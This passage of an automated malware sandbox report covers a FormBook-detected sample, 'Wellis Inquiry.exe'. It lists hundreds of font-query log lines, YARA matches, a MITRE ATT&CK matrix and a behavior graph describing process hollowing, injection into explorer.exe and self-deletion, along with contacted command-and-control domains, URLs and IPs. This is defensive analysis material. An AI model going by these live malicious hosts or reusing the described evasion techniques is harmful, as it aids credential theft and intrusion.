          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules1 | Path Interception | Process Injection512 | Masquerading1 | OS Credential Dumping | Security Software Discovery221 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion31 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection512 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | System Information Discovery112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information4 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

          Behavior Graph

Behavior Graph ID: 502627 | Sample: Wellis Inquiry.exe | Startdate: 14/10/2021 | Architecture: WINDOWS | Score: 100

Start node
  DNS/IP: www.quickcarehomeopathic.com; parkingpage.namecheap.com
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
  -> Wellis Inquiry.exe (started)
     -> Wellis Inquiry.exe (started)
        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        -> explorer.exe (injected)
           DNS/IP: www.marunouchi1.com 183.90.240.3, 49808, 80 SAKURA-CSAKURAInternetIncJP Japan; aceserial.xyz 151.106.117.36, 49818, 80 PLUSSERVER-ASN1DE Germany; 9 other IPs or domains
           Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
           -> cmmon32.exe (started)
              Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
              -> cmd.exe (started)
                 -> conhost.exe (started)

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
Wellis Inquiry.exe | 9% | ReversingLabs | ByteCode-MSIL.Spyware.Noon

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
3.2.Wellis Inquiry.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
psychedeliccosmetics.com | 34.102.136.180 | true | false | | unknown
aceserial.xyz | 151.106.117.36 | true | true | | unknown
www.marunouchi1.com | 183.90.240.3 | true | true | | unknown
www.ovmfinacial.com | 199.59.242.153 | true | true | | unknown
parkingpage.namecheap.com | 198.54.117.210 | true | false | | high
www.ebookgratis.online | 104.21.2.218 | true | true | | unknown
shops.myshopify.com | 23.227.38.74 | true | true | | unknown
www.richartware.com | unknown | unknown | true | | unknown
www.blackmagiccomics.com | unknown | unknown | true | | unknown
www.psychedeliccosmetics.com | unknown | unknown | true | | unknown
www.dollpartyla.com | unknown | unknown | true | | unknown
www.aceserial.xyz | unknown | unknown | true | | unknown
www.quickcarehomeopathic.com | unknown | unknown | true | | unknown

                                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.marunouchi1.com/ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_ | true | Avira URL Cloud: safe | unknown
http://www.aceserial.xyz/ag9v/?9rq=8aghxAEFV3UFLmLUmwXrjnry4I8PGHpXxFVOvh2n7b9U9R7NlIya57CFUx9pJqwzlAw7&BFQ=5jI0jhMHA0hx_ | true | Avira URL Cloud: safe | unknown
www.psychedeliccosmetics.com/ag9v/ | true | Avira URL Cloud: safe | low
http://www.psychedeliccosmetics.com/ag9v/?9rq=B7neoLnMPG5T4Lq1mgXXW304ryc0TDTB8h8f/WhOEZEEcWgrsd/ecy8wgWRxVB11aSvz&BFQ=5jI0jhMHA0hx_ | false | Avira URL Cloud: safe | unknown
http://www.ovmfinacial.com/ag9v/?9rq=vpuErUH2OwLAPGAltxg3/Zj6XscnxJenLEapnG3NwgRlKVIYyl0HnfsKneQfORBHqYbR&BFQ=5jI0jhMHA0hx_ | true | Avira URL Cloud: safe | unknown

                                    URLs from Memory and Binaries


                                                          Contacted IPs


                                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
199.59.242.153 | www.ovmfinacial.com | United States | 395082 | BODIS-NJUS | true
183.90.240.3 | www.marunouchi1.com | Japan | 9371 | SAKURA-CSAKURAInternetIncJP | true
151.106.117.36 | aceserial.xyz | Germany | 61157 | PLUSSERVER-ASN1DE | true
